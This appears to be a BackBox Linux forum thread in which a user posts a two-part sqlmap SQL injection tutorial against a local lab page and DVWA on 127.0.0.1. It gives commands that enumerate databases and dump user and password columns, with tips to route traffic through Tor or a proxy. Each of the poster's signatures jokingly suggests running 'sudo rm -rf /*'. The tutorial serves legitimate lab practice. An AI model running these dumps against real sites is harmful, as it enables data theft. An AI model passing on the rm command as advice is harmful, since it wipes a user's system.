Author Topic: SqlMap - SQL Injection with BackBox part 1/2  (Read 25439 times)

ZEROF

  • Hero Member
  • *****
  • Posts: 1246
    • View Profile
    • Pen Tester
on: June 29, 2012, 01:18:12 PM
SqlMap

Sql Injection Tool part 1

OS/OS: BackBox Linux (version 2.05)
Target : 127.0.0.1
Vulnerable Url : 127.0.0.1/SQLInjection/injection.php?id=1

Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :

Code: [Select]
sqlmap -u some.com/index.php?id=1 --dbs
sqlmap -D mysql data base --tables
sqlmap -D mysql data base -T table name --columns
sqlmap -D mysql data base -T table name -C column or columns name --dump

Video

http://www.youtube.com/watch?v=BDI0t1gBUMA


« Last Edit: June 29, 2012, 02:08:50 PM by ZEROF »


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


ZEROF

  • Hero Member
  • *****
  • Posts: 1246
    • View Profile
    • Pen Tester
Reply #1 on: June 29, 2012, 02:07:56 PM
SqlMap + Live Http Headers Addon

Sql Injection Tool part 2

OS: BackBox Linux (version2.05)
Tool on +: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/

I will use cookies from session to run SQL injection attack. Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :

Code: [Select]
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' --dbs

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa --tables

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump

Video

http://youtu.be/4Dg0ODJBZxM


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


drego85

  • Global Moderator
  • Full Member
  • *****
  • Posts: 128
    • View Profile
    • Andrea Draghetti
Reply #2 on: July 03, 2012, 12:32:20 PM
+1

Thanks for demostration!

Andrea Draghetti
Personal Blog


V3nD3774

  • Newbie
  • *
  • Posts: 31
    • View Profile
Reply #3 on: March 08, 2013, 10:52:36 PM
ZEROF,
is the link:  127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

I did try few times but no luck.

Tx

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.



b4d_bl0ck

  • Sr. Member
  • ****
  • Posts: 285
    • View Profile
Reply #4 on: March 09, 2013, 03:54:16 AM
Thanks for sharing, ZEROF. Nice vids.. and nice BB desktop aspect.

V3nD3774   :o
Try:
Code: [Select]
ping 127.0.0.1If the host is reachable but you cannot access that URI, most probably your ISP is tracking you and blocking your connections, and maybe has alredy provided your data to a cybercrime investigation agency.
In this case a successful solution could be:
Code: [Select]
less /etc/hosts also
Code: [Select]
sudo ifconfig lo or if it's not enough try this.
Good luck!
« Last Edit: March 09, 2013, 04:07:04 AM by b4d_bl0ck »

bool secure = check_paranoia() ? true : false;


ZEROF

  • Hero Member
  • *****
  • Posts: 1246
    • View Profile
    • Pen Tester
Reply #5 on: March 13, 2013, 09:10:04 PM
Quote
ZEROF,
is the link:  127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

When you need to find path for files use whereis or find command. Let's say you want to find injection.php file in your system, you can use from terminal:

find / -name injection.php

How to use find command:

Cheers !


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


V3nD3774

  • Newbie
  • *
  • Posts: 31
    • View Profile
Reply #6 on: March 21, 2013, 11:15:53 AM
Sorry ZEROF,
I might have misunderstood your message (likely because I am a nooob..) but I was not looking how to find a file in my machine...rather was asking whether the link : 127.0.0.1/SQLInjection/injection.php?id=1  it is still a valid link...this because when i try to reach this link i just get the following message:

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.
Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80

I will not even comment re b4d_bl0ck post...it is quite hilarious to say the least (...and maybe has alredy provided your data to a cybercrime investigation agency)...

Tx again,
~V



b4d_bl0ck

  • Sr. Member
  • ****
  • Posts: 285
    • View Profile
Reply #7 on: March 21, 2013, 12:01:36 PM
V3nD3774, sorry for my irony, i didn't want to offend you.
I just wanted encurage you to read, before getting hands on things... and i guess you didn't visit the link i provided you.  :)
What i was trying to explain you is that 127.0.0.1 is nothing more than your PC. If you have no Apache server running on your system listening on port 80, or you have no resource on your server named /SQLInjection/injection.php, you'll never be able to open it. Evidently ZEROF created a vulnerable app by his own hands or downloaded it, and put it in his server, ready to be exploited.
The URL will never be a valid link to you, until you do the same and put in your server a page with the same path and name. That's not an internet resource, but a local one, so it ha no sense asking others if it's a valid link or not...  ;)
Sorry for having joked in the first reply.

Have fun!

bool secure = check_paranoia() ? true : false;


V3nD3774

  • Newbie
  • *
  • Posts: 31
    • View Profile
Reply #8 on: March 22, 2013, 11:27:34 AM
tx b4d_bl0ck, now it is clearer.